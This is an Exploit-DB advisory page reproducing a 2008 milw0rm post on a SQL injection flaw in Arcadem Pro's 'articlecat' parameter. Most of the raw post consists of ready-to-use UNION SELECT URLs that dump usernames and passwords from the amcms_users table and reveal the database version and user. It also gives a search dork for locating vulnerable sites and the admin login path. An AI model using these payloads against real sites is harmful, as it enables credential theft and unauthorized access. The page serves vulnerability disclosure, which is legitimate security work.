Arcadem Pro (articlecat) Remote SQL Injection Vulnerability

vendor:

Arcadem Pro

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Arcadem Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Arcadem Pro (articlecat) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Arcadem Pro (articlecat). An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized information or to manipulate data. The malicious SQL statements can be sent to the vulnerable application via the 'articlecat' parameter in the 'loadpage' parameter of the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Arcadem Pro (articlecat) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php
|
| DorK   : Copyright Â© 2007 Agares Media. Powered by AMCMS3.
|___________________________________________________|


Exploit:
________



www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--


USer version


www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--





Admin LogIn :

www.[target].com/admin/





____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-29]